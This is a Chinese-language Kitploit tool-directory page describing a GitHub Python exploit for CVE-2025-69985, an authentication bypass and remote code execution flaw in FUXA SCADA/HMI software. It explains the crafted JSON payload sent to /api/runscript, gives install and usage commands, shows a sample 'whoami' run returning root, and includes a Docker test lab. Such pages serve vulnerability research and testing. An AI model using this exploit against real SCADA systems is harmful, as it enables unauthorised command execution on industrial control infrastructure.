Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-69985 — 针对 CVE-2025-69985 的 Python 漏洞利用,目标是 FUXA SCADA 软件。向 /api/runscript 端点发送精心构造的 JSON 负载以绕过认证并实现远程代码执行。 | Kitploit
工具/GitHubGitHub/joshuavanderpoll/cve-2025-69985
漏洞分析漏洞利用SCADA/ICS安全Web应用程序漏洞利用身份验证远程访问工具
GitHubjoshuavanderpoll/cve-2025-69985

CVE-2025-69985

针对 CVE-2025-69985 的 Python 漏洞利用,目标是 FUXA SCADA 软件。向 /api/runscript 端点发送精心构造的 JSON 负载以绕过认证并实现远程代码执行。

查看仓库
256个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

FUXA ≤ 1.2.8 认证绕过 + 远程代码执行 (CVE-2025-69985)

Python

📜 描述

此Python利用程序针对CVE-2025-69985,即FUXA(基于Web的SCADA/HMI软件)版本≤1.2.8中的一个严重认证绕过漏洞。通过向未受保护的/api/runscript端点发送带有嵌入式Node.js代码的精心构造的JSON负载,它能够以FUXA进程的身份实现远程命令执行,并在响应中同步捕获完整的标准输出/标准错误。

🛠️ 安装

[!NOTE] 为确保项目依赖的干净隔离环境,建议使用Python的venv模块。

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ 使用

root@kitploit:~
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami

 目标 : http://localhost:1881
 命令 : whoami

[*] 准备负载 → 执行:whoami
[*] 发送利用请求至 /api/runscript ...
[*] 响应状态码:200
[+] 命令执行成功! (CVE-2025-69985 绕过)

=== 命令输出 ===
"root\n"


======================================================================
 利用完成!
======================================================================

🐋 Docker PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# 可在 --url http://127.0.0.1:1881/ 进行测试

💻 示例

执行PoC

📢 免责声明

此工具仅用于教育和研究目的。创作者对因使用该工具而造成的任何滥用或损害不承担任何责任。

下载工具